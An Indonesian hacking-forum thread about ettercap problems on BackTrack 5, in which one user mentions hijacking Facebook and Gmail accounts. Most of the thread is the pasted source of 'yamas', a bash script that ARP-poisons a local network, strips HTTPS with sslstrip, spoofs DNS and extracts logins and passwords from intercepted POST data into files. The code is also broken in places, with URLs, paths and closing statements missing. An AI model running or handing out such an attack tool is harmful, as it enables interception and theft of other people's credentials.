ask-> ettercap in BT5
Mau tanya nih kepada mastah2 BT disini:

adakah penghuni disini yang mempunyai maslah dengan ettercap waktu mencoba remote_browser? cause ane coba di BT5 remote_browser tidak berjalan dengan mulus seperti pendahulunya (BT4 R2) ane udah coba edit melalui nano nya tetep aja ga bisa.....

memang ettercap di bt5 bermasalah bro... makanya ane make bt4R2 untuk menjalankan ( tools buatan ane ) untuk keperluan sniffing , spoofing dll.. ada yang tau kenapa ya ? soalnya di forum resmi .. ada yang nanya masalah ini .. tapi gk ada yang bisa jawab .. Smile
FOLLOW @DutaLinux
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(06-06-2011, 04:18 AM)zee eichel Wrote: memang ettercap di bt5 bermasalah bro... makanya ane make bt4R2 untuk menjalankan ( tools buatan ane ) untuk keperluan sniffing , spoofing dll.. ada yang tau kenapa ya ? soalnya di forum resmi .. ada yang nanya masalah ini .. tapi gk ada yang bisa jawab .. Smile

wah sama dong bro, untuk saat ini kalo mau bajak account FB, gmail dkk harus ganti dulu pake BT4r2 Big GrinBig Grin

tapi untuk armitage di BT5 lebih yahudd...........bekerja dengan sempurna di BT5.

Berarti ettercap diBT5 masih belum stabil dong........

iya ettercap masi ada masalah di bt5

sudah reinstall jg tetep bermasalah

(06-07-2011, 10:19 PM)devilnay Wrote: iya ettercap masi ada masalah di bt5

sudah reinstall jg tetep bermasalah

waktu pertama install BT5 ane coba scan host list langsung hilang gitu ettercap nya terus ane coba install ulang ettercap nya dan berhasil scan list, tetapi pas mau coba remote_browser ga jalan-jalan tuh ettercapnya...

ane coba edit: nano /etc/etter.conf

dibagian redir ane hilangin tanda # nya terus di remote_browser yang tadinya "mozilla" ane ganti "firefox" tetep aja ga bisa. jadi pusing sendiri deh...........HuhHuhHuh

Trus skrng udah bisa blm om?
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

(08-27-2011, 01:15 AM)THJC Wrote: Trus skrng udah bisa blm om?

udah bisa om sekarang. udah ada post di backtrack linux forum buat fix ettercap bt5.
reinstall katanya.
ada yang masih ingat?
(menyesal ga gw save page)

yang install fresh make bt5 R1 udah fix kok ..

(09-01-2011, 04:13 PM)clowthu.ind Wrote:
(08-27-2011, 01:15 AM)THJC Wrote: Trus skrng udah bisa blm om?

udah bisa om sekarang. udah ada post di backtrack linux forum buat fix ettercap bt5.
reinstall katanya.
ada yang masih ingat?
(menyesal ga gw save page)

(09-01-2011, 04:32 PM)cassaprodigy Wrote: yang install fresh make bt5 R1 udah fix kok ..

kalo saya update manual dari bt5 ke bt5 r1
cara fixnya gmn?
saya selalu menthok kalo pake egharts dan
sudah putus asa Sad
root@IBTeam# ^C

script om zee itu buat bt4r2..
ini yang buat bt5

sniffing traffic
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.

fast_cleanup() {
echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
if [[ $looparseid != "" ]]; then kill $looparseid; fi
if [[ $sslstripid != "" ]]; then kill $sslstripid; fi
if [[ $tailgrepid != "" ]]; then kill $tailgrepid; fi
if [[ $dnsid != "" ]]; then kill $dnsid; fi
if [[ $etterspoofid != "" ]]; then kill $etterspoofid; fi
if [[ "$1" = "-e" || "$2" = "-e" ]]; then
killall ettercap
killall arpspoof
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush             # there are probably too many resets here,
iptables --table nat --flush        # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
if [ -e '/tmp/' ]; then
rm /tmp/
echo -e "\033[32m[-] Clean up successful !\033[m"
exit 0

#Let's define some arguments that can be passed to the script :
if [[ "$1" = "-p" || "$1" = "--parse" ]]; then #parse a given filename
    if [[ $2 == "" ]]; then
echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
exit 0
wget -q -O /tmp/grepcred.txt
echo -e "Parsing $2 for credentials.\n\n"
cat $2 |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
exit 0

if [[ "$1" = "-e" || "$2" = "-e" ]]; then
    echo -e "\tYou will be using Ettercap instead of ARPspoof."
    sleep 0.5
if [[ "$1" = "-h" || "$1" = "--help" ]]; then #define help message
echo -e "You are running $0, version $version.

usage : $0 [-h -c -p]* [-e -s]**
    -h or --help  :    Display this help message, disclaimer and exit.
    -c or --change: Display changelog and todo.    
    -e :    Use ettercap instead of ARPspoof. One might have one's reasons...
            ARPspoof is default.
    -p or --parse :    Only parse the given <file>. Don't use wildcards.
            Use > /output_file to print to a file.
    -s : The script won't download anything. Make sure you have the needed files.
    *Must be used alone
    **Can be used at the same time.
\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.

\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting."
exit 0
if [[ "$1" = "-c" || "$1" = "--change" ]]; then #Changelog
echo -e "\033[31m Changelog :\033[m
Should be added in next version/revision :
- Submit your ideas !
- We're close to a final version !
- Clean up. Big time.

Added in v0.9.x
- DNS spoofing in beta version. Any help appreciated !
- Little adaptation for BT5r1 regarding ip route (0.9.7)
- Code enhancing thanks to snafu777 (0.9.6)
- Do not delete /tmp/grepcred.txt when done so that a next use with -s won't fail. (0.9.6)
- Silent mode (-s) (0.9.5)
- Ettercap support (with -e switch in parameters)
- Code enhancing.

Added in v0.8.x
- Tail-greping log file so we can be sure there is traffic being sniffed
- New parsing method from scratch : should be lighter, less CPU consuming, and most of all, outputs websites as well.
    This should be tested though to ensure maximum reliability. Please report back !
    0.8.5 : now grep from downloaded file, to allow more updates on parsing, without updating the whole script.
- New -p option to allow only parsing a file. (v0.8.5)
- More improvements.
- Catching ^C and cleanup before quitting. (v0.8.5)
- Realtime parsing menu. (V0.8.5)

\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Install sslstrip if needed.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D

\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to the people responsible for the tools I am using in this script.

Please criticize this program or submit ideas on the official thread at or send me a mail at [email protected]"

### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
message="\nNo message to display : you are running in silent mode"
wget -q -O /tmp/message
message=$(cat /tmp/message) #store it to variable
rm /tmp/message #remove temp message file

if [[ $1 = "-s" || $2 = "-s" ]]; then
echo "ASCII tables won't be available."
echo "ASCII tables are not available due to the use of silent mode." > /tmp/ascii
wget -q -O /tmp/ascii

### Check for updates !
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
echo "Not checking for a new version : silent mode."
wget -q -O /tmp/version # Get last version number
last_version=$(cat /tmp/version) #store it to variable
rm /tmp/version #remove temp version file

if [[ $last_version > $version ]] ; then # Comparing to current version
    echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)"
    read update
      if [[ $update = Y || $update = y ]] ; then
    echo "[+] Updating script..."
    wget -q -O $0
    chmod +x $0
    echo "[-] Script updated !"
      if [[ $0 != '/usr/bin/yamas' ]] ; then
      echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
      read install
        if [[ $install = Y || $install = y ]] ; then #do not proceed to install if using installed version : updating it already "installed" it over.
        cp $0 /usr/bin/yamas
        chmod +x /usr/bin/yamas
        echo "Script should now be installed, launching yamas !"
        sleep 3
        exit 1
            else echo "Ok, continuing with updated version..."
      sleep 3
      exit 1
    sleep 2
    exit 1
      else echo "Ok, continuing with current version..."
else echo "No update available"
### End of update process

### Install process
if [[ ! -e '/usr/bin/yamas' ]] ; then
  echo "Script is not installed. Do you want to install it ? (Y/N)"
  read install
  if [[ $install = Y || $install = y ]] ; then
    cp -v $0 /usr/bin/yamas
    chmod +x /usr/bin/yamas
    rm $0
    echo "Script should now be installed. Launching it !"
    sleep 3
    exit 1
  else echo "Ok, not installing then !"
else echo "Script is installed"
sleep 1
### End of install process
echo -e "
          _______  _______  _______  _______             _______      _____  
|\     /|(  ___  )(       )(  ___  )(  ____ \  |\     /|(  __   )    / ___ \
( \   / )| (   ) || () () || (   ) || (    \/  | )   ( || (  )  |   ( (   ) )
\ (_) / | (___) || || || || (___) || (_____   | |   | || | /   |   ( (___) |
  \   /  |  ___  || |(_)| ||  ___  |(_____  )  ( (   ) )| (/ /) |    \____  |
   ) (   | (   ) || |   | || (   ) |      ) |   \ \_/ / |   / | |         ) |
   | |   | )   ( || )   ( || )   ( |/\____) |    \   /  |  (__) | _ /\____) )
   \_/   |/     \||/     \||/     \|\_______)     \_/   (_______)(_)\______/ " # <= I love it.
echo -e "===========================================================================
=\033[31m       Welcome to Yet Another MITM Automation Script.\033[m                    =
=\033[31m       Use this tool responsibly, and enjoy!\033[m                             =
=       Feel free to contribute and distribute this script as you please. =
=       Official thread :                    =
=       Check out the help (-h) to see new features and informations      =
=       You are running version \033[32m$version\033[m                              =
echo -e "\033[36mMessage of the day :\033[m"
echo -e "$message"
# Starting fresh : reset IP forward and iptables
echo -e "\033[31m [+] Cleaning iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."

# Defining exit function and other ending features

cleanup() {
echo -e "\033[31m[+] Killing processes and resetting iptable.\033[m"

kill $sslstripid
kill $looparseid
if [[ $tailgrepid != "" ]]; then kill $tailgrepid
if [[ "$1" = "-e" || "$2" = "-e" ]]; then
killall ettercap
killall arpspoof
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush             # there are probably too many resets here,
iptables --table nat --flush        # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/

echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in /root/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]] ; then # double brackets because double condition. || signifies "or"
    cp /tmp/$filename.txt /root/$filename.txt #moving file
    if [ -f "/root/$filename.txt" ]; then #check if it exists
        echo "Log file copied !" #it does
        else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
    else echo "Logs not saved"
echo "Do you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in /root/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]] ; then # double brackets because double condition. || signifies "or"
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
echo "Not downloading needed 'grepcred.txt' file because of silent mode. Make sure you already have a copy or the parsing *will* fail."
wget -q -O /tmp/grepcred.txt
cat /tmp/$filename.txt |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq >> /root/$filename.pass.txt # >> appends to a potential previous file.
    if [ -f "/root/$filename.pass.txt" ]; then #check if it exists
        echo "Passwords saved !" #it does
        else echo "Error while saving passwords" #it does not
    else echo "Password saving skipped."
rm /tmp/$filename.txt
echo -e "\nTemporary files deleted."

if [ -f "/usr/bin/yamas" ]; then #check if script is already installed
    exit 1 #if yes, exit.
    echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
    read -e install
        if [[ $install = "Y" || $install="y" ]] ; then
        cp ./ /usr/bin/yamas #copy and rename script
        echo -e "\033[32m Script installed !\033[m"
        else echo "Script not installed."
exit 1

updatestrip() {
wget -q
        tar zxvf sslstrip-0.9.tar.gz
        cd sslstrip-0.9
        python ./ install > /dev/null
        cd ..
        rm sslstrip-0.9.tar.gz

search=$(ip route show | awk '(NR == 1) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.
rescan () {
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
echo -en "\033[m"

add_target() {
echo "Enter a new IP adress to attack :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2

ascii() {
cat /tmp/ascii
rm /tmp/ascii

tailsecure() {
xterm -geometry 50x50+10+10 -T "Tail-greping for resolved host." -e "tail -f /tmp/$filename.txt | grep 'Resolving host:'" & tailgrepid=$!

dns_spoof() {
### Make Host function###
mkhst() {
echo "Enter your redirection list line by line. End with #.
Usage is :
Wildcards may be used."
rm ~/hosts_spoof
while :
read input
echo "$input" >> ~/hosts_spoof
if [[ $input == "#" ]]; then break; fi
echo "If you already have a host file, enter its path. If you don't, press enter."
read gothost
if [[ $gothost != "" ]]; then
echo "Host file $gothost will be used."
else echo -e "We'll make one...\n"

xterm -geometry 90x3-1-1 -T "DNS spoofing" -e dnsspoof -i wlan0 -f ~/hosts_spoof & dnsid=$!

choose_dns() {
echo "Would you like to use Ettercap 'dns_spoof' plugin or dnsspoof ? (E/D)"
read spoofpgm
case $spoofpgm in
E) echo "We'll use ettercap. Make sure to have edited /usr/share/ettercap/etter.dns"
ettercap -D -q -i wlan0 -T -P dns_spoof & etterspoofid=$! ;;
D) echo "We'll use dnsspoof."
dns_spoof ;;
*) echo "Wrong choice. Please use E or D"


rtparse() {
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out?  It's singular options without a space, so I think the need for quotes is NOT needed??
1) echo -e "\033[33m[+]Pausing...\033[m"
    kill -19 $looparseid
    echo -e "\033[33m[-]Paused.\033[m"
2) echo -e "\033[33m[+]Resuming...\033[m"
    kill -18 $looparseid
    echo -e "\033[33m[-]Resumed.\033[m"
3) echo -e "\033[31m[+]Killing...\033[m"
    kill $looparseid
    echo -e "\033[33m[-]Killed.\033[m"
4) echo -e "\033[32m[+]Launching...\033[m"
    xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/ & looparseid=$!
    sleep 2
    echo -e "\033[33m[-]Launched.\033[m"
5) echo "Previous"
    final ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =)

final() {
echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Tail-grep hosts through output (make sure there is traffic).
5. Real-time parsing...
6. DNS spoofing (beta)
7. Quit properly.

Enter the number of the desired option."
read final
case $final in
1) rescan ;;
2) add_target ;;
3) ascii ;;
4) tailsecure ;;
5) rtparse ;;
6) choose_dns ;;
7) cleanup ;;
*) echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
    final ;;

###############################End of functions#############################

# IP forwarding
echo -e "\033[31m [+] Activating IP forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."

echo -e "\033[31m [+] Configuring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
read -e outport
if [ "$outport" = "" ] ; then
echo -e "Port $outport selected as default.\n"
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
read -e inport
if [ "$inport" = "" ] ; then
echo -e "Port $inport selected as default.\n"
echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"

echo -e "\033[31m [+] Activating sslstrip... \033[m"
echo  "Choose filename to output : (default = yamas)"
read -e filename
if [ "$filename" = "" ] ; then
echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"
#### BEGIN of update process ####
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
echo "Not checking for updates here either. Sslstrip should be installed or attack will fail."
sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
if [ -e '/usr/local/bin/sslstrip' ]; then # If sslstrip exists
    sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #store version to var
    if [[ $sslversion < "0.9" ]]; then #if less than 0.9, ask to update
    echo -e "Sslstrip version $sslversion is installed but a newer one (0.9) exists. Do you want to update \033[4mand\033[m install latest
version ? [Y/N]
Note that it will download it from the official website, but might be not supported by BT team on the forums as long as it's not in the repos. It
should be safe to use though."
    read -e sslupdate
        if [[ $sslupdate = "Y" || $sslupdate = "y" ]] ; then #if yes, updating.
        sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #re-store version to var
            if [[ $sslversion = "0.9" ]]; then echo -e "\n\033[32mInstall successful !\033[m"
              else echo "\033[33mOops, install failed.\033[m Continuing with current version."
        else echo "All right, continuing with current version."
     elif [[ $sslversion = "0.9" ]]; then
     echo -e "\n\033[32mSslstrip is up to date, continuing...\033[m"
sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!

elif [ -x '/pentest/web/sslstrip/' ]; then
sslversion=$(cat /pentest/web/sslstrip/ | grep "gVersion =" | awk -F \" ' {print $2} ') #store version to var
    if [[ $sslversion < "0.9" ]]; then #if less than 0.9, ask to update
    echo -e "Sslstrip v$sslversion was found, not installed, but executable. Do you want to \033[4mU\033[mpdate or \033[4mC\033[montinue ? "
    read -e sslupdate
        if [[ $sslupdate = "U" || $sslupdate = "u" ]] ; then #if yes, updating.
        sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #re-store version to var
            if [[ $sslversion = "0.9" ]]; then echo -e "\n\033[32mInstall successful !\033[m"
            sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
            sleep 3
              else echo "\033[33mOops, install failed.\033[m Continuing with current, non installed version."
              /pentest/web/sslstrip/ -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
        sleep 3
        else echo "All right, continuing with current, non-installed version."
        /pentest/web/sslstrip/ -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
        sleep 3
elif [ -e '/pentest/web/sslstrip/' ]; then
            echo "Sslstrip was found, but not installed and not executable. Making it executable... (not installing)"
            chmod +x '/pentest/web/sslstrip/'
            if [ -x '/pentest/web/sslstrip/' ]; then
            echo "Now it is. Continuing..."
                /pentest/web/sslstrip/ -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
                sleep 3
else echo "Sslstrip couldn't be found. You might be using a wrong version of this script or it is not
You can download BT4r2 version of this script at To install sslstrip use
apt-get install sslstrip. Do you want to install it ? (will quit after) Y/N"
    read apti
      if [[ $apti = "Y" || $apti = "y" ]] ; then
    apt-get install sslstrip
    exit 1

sleep 2 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?

echo -e "\033[31m [+] Activating ARP cache poisoning... \033[m"
ip route show | awk '(NR == 1) { print "Gateway :", $3,"    ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 1) { print $5}')
gateway=$(ip route show | awk '(NR == 1) { print $3}') #store gateway ip
echo "Enter IP gateway adress or press enter to use $gateway."
read -e gateway
if [ "$gateway" = "" ] ; then
gateway=$(ip route show | awk '(NR == 1) { print $3}') #restore gateway ip since pressing enter set our var to null
echo -e "$gateway selected as default.\n"
echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
read -e iface
if [ "$iface" = "" ] ; then
iface=$(ip route show | awk '(NR == 1) { print $5}') #store default interface
echo -e "$iface selected as default.\n"
echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read -e choicearp

if [[ $choicearp = "D" || $choicearp = "d" ]] ; then
echo -e "Do you want to map the network to show live hosts? (Y/N)    [This might take up to 30 secs, be patient]"
read -e hosts
echo -e "\033[31m "
    if [[ $hosts = "Y" || $hosts = "y" ]] ; then
    nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
    echo -e "\033[m " # switch color back to white
    else echo -e "\033[m "
echo -e "Please enter targets according to usage : IP1 IP2 IP3...
\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
arpspoofi() { # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ]; do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
ettercapi() { # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ]; do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp  /$gateway/ /$1/ 2>/dev/null & sleep 2
echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
read -e parameters
    if [[ "$1" = "-e" || "$2" = "-e" ]]; then
    ettercapi $parameters
    arpspoofi $parameters

      if [[ "$1" = "-e" || "$2" = "-e" ]]; then
xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp  // // &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"

echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"

echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo "looparse(){" > /tmp/
if [[ "$1" = "-s" || "$2" = "-s" ]]; then sleep 0.5
echo "wget -q -O /tmp/grepcred.txt" >> /tmp/
echo "while :
    echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
    cat /tmp/$filename.txt |
awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
egrep -i -f '/tmp/grepcred.txt' |
awk -F \"=\" '{if (length(\$2) < 3) print \"\";
else if (\$1 ~/[W]/) print \$0;
else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
else print \"Login = \t\t\", \$2}' |
sleep 7
looparse" >> /tmp/ #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/ & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.

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